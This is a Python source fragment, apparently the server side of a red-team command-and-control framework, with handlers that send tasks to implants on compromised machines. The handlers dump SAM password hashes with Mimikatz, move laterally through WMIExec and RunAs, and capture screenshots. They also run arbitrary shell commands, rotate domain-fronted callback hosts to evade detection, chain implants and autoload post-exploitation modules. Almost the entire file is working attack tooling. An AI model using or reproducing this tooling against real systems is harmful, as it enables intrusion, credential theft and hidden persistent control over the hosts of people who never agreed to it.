def do_rotation(user, command, randomuri): domain = input("Domain or URL in array format: \"https://www.example.com\",\"https://www.example2.com\" ") domainfront = input("Domain front URL in array format: \"fjdsklfjdskl.cloudfront.net\",\"jobs.azureedge.net\" ") new_task("set-variable -name rotdf -value %s" % domainfront, user, randomuri) new_task("set-variable -name rotate -value %s" % domain, user, randomuri)
def do_get_rotation(user, command, randomuri): new_task("get-variable -name rotdf", user, randomuri) new_task("get-variable -name rotate", user, randomuri)
def do_stopsocks(user, command, randomuri): update_label("", randomuri) new_task(command, user, randomuri)
def do_reversedns(user, command, randomuri): params = re.compile("reversedns ", re.IGNORECASE) params = params.sub("", command) new_task("[System.Net.Dns]::GetHostEntry(\"%s\")" % params, user, randomuri)
def do_ps(user, command, randomuri): new_task("get-processlist", user, randomuri)
def do_hashdump(user, command, randomuri): check_module_loaded("Invoke-Mimikatz.ps1", randomuri, user) new_task("Invoke-Mimikatz -Command '\"lsadump::sam\"'", user, randomuri)
def do_pbind_loadmodule(user, command, randomuri): params = re.compile("pbind-loadmodule ", re.IGNORECASE) params = params.sub("", command) new_task(("pbind-loadmodule %s" % params), user, randomuri)
def do_get_screenshot(user, command, randomuri): taskcmd = "screencapture -x /tmp/s;base64 /tmp/s;rm /tmp/s" new_task(taskcmd, user, randomuri)
def do_invoke_wmiexec(user, command, randomuri): check_module_loaded("Invoke-WMIExec.ps1", randomuri, user) params = re.compile("invoke-wmiexec ", re.IGNORECASE) params = params.sub("", command) cmd = "invoke-wmiexec %s" % params new_task(cmd, user, randomuri)
def do_invoke_runas(user, command, randomuri): check_module_loaded("Invoke-RunAs.ps1", randomuri, user) params = re.compile("invoke-runas ", re.IGNORECASE) params = params.sub("", command) cmd = "invoke-runas %s" % params new_task(cmd, user, randomuri)
def do_get_implantworkingdirectory(user, command, randomuri): new_task("pwd", user, randomuri)
def do_remove_servicelevel_persistence(user, commmand, randomuri): new_task("sc.exe delete CPUpdater", user, randomuri)
def do_startanotherimplant(user, command, randomuri): new_task('startanotherimplant', user, randomuri)
def do_shell(user, command, randomuri): new_task(command, user, randomuri)
def do_invoke_daisychain(user, command, randomuri): check_module_loaded("Invoke-DaisyChain.ps1", randomuri, user) urls = get_allurls() new_task("%s -URLs '%s'" % (command, urls), user, randomuri) update_label("DaisyHost", randomuri) print("Now use createdaisypayload")
def do_loadpowerstatus(user, command, randomuri): update_label("PSM", randomuri) new_task(command, user, randomuri)
def autoruns(self): if "C#" in self.Pivot: new_task("loadmodule Stage2-Core.exe", "autoruns", self.RandomURI) new_task("loadmodule PwrStatusTracker.dll", "autoruns", self.RandomURI) update_mods("Stage2-Core.exe", self.RandomURI) update_mods("PwrStatusTracker.dll", self.RandomURI) new_task("loadpowerstatus", "autoruns", self.RandomURI) update_label("PSM", self.RandomURI) if "PS" in self.Pivot: new_task("loadmodule Stage2-Core.ps1", "autoruns", self.RandomURI) update_mods("Stage2-Core.ps1", self.RandomURI) if "PB" in self.Pivot: update_label("Parent: %s" % self.IPAddress, self.RandomURI) new_task("pbind-loadmodule Stage2-Core.exe", "autoruns", self.RandomURI) update_mods("Stage2-Core.exe", self.RandomURI) result = get_autoruns() if result: for autorun in result: run_autoloads(autorun[1], self.RandomURI, "autoruns") new_task(autorun[1], "autoruns", self.RandomURI)